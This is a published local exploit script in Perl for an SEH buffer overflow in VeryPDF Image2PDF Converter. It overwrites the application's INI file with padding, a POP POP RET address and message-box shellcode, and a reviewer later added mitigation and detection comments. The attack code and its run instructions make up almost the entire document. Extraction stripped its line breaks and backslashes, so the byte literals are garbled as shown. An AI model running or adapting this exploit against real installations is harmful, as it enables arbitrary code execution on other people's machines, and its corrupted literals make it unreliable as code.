
VeryPDF Image2PDF Converter SEH Buffer Overflow

Posted on 10 October 2015

#******************************************************************************
#
# Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow
# Date: 10-7-2015
# Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe
# Exploit Author: Robbie Corley
# Platform Tested: Windows 7 x64
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# The title parameter contained within c:\windows\Image2PDF.INI is vulnerable
# to a buffer overflow. This can be exploited using SEH overwrite.
#
# Instructions:
# 1. Run this sploit as-is. This will generate the new .ini file and place it
#    in c:\windows, overwriting the existing file
# 2. Run the Image2PDF program, hit [try], file --> add files
# 3. Open any .tif file. Here's the location of one that comes with the
#    installation: C:Program Files (x86)VeryPDF Image2PDF v3.2 rial.tif
# 4. Hit 'Make PDF', type in anything for the name of the pdf-to-be, and be
#    greeted with your executed shellcode ;)
#******************************************************************************
#
# What this script does: it builds one long string and writes it as the
# m_szTitle value of an Image2PDF.INI file, replacing the application's
# existing configuration file.
#
# NOTE(review): the listing appears to have lost its line breaks and most of
# its backslashes when the page was extracted (the path in the open() call
# still carries them, the header paths and the string literals do not). Every
# literal below is reproduced exactly as the page shows it.
#
# NOTE(review): the author's description implies the application copies the
# title value into a fixed-size buffer without a length check; the
# application's code is not on this page, so that is an inference. The
# application-side fix for this class of bug is to bound the length of every
# INI value before copying it.

#standard messagebox shellcode.
$shellcode =
"x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42".
"x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03".
"x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b".
"x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e".
"x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c".
"x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74".
"x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe".
"x49x0bx31xc0x51x50xffxd7";

# Filler placed in front of the overwritten handler record: the literal
# repeated 2985 times with the repetition operator.
$padding="x90" x 2985;

# pack('V', ...) emits the value as an unsigned 32-bit little-endian integer.
# NOTE(review): a hard-coded address like this only holds when the module that
# contains it loads at a fixed base and is not protected by SafeSEH; which
# module it belongs to cannot be told from this page. Linking with /SAFESEH
# and /DYNAMICBASE and enabling SEHOP are the usual mitigations for this class
# of overwrite.
$seh=pack('V',0x6E4B3045); #STANDARD POP POP RET

# Trailing filler: the literal repeated 1096 times.
$morepadding="x90" x 1096;

# Opens the INI for writing, truncating any existing file. This is a
# two-argument open on a bareword handle and its return value is not checked.
# (The original comment called this a "DWF file"; what is written is the .ini.)
# Defender view: the application trusts a configuration file that any process
# able to write to this path can replace, and an m_szTitle line thousands of
# characters long is a simple indicator to look for in that file.
open(myfile,'>c:\windows\Image2PDF.INI'); #generate the .ini file

#.ini file header & shellcode
# The value after "m_szTitle=" is, in order: $padding, a short literal, $seh,
# $shellcode, $morepadding.
print myfile "[SaveMode] m_iMakePDFMode=0 m_iSaveMode=0 m_szFilenameORPath= m_iDestinationMode=0 m_bAscFilename=0 m_strFileNumber=0001 [BaseSettingDlg] m_bCheckDespeckle=0 m_bCheckSkewCorrect=0 m_bCheckView=0 m_szDPI=default m_bCheckBWImage=1 [SetPDFInfo] m_szAuthor= m_szSubject= m_szTitle=".$padding."xEBx06x90x90".$seh.$shellcode.$morepadding;

close (myfile); #close the file

 
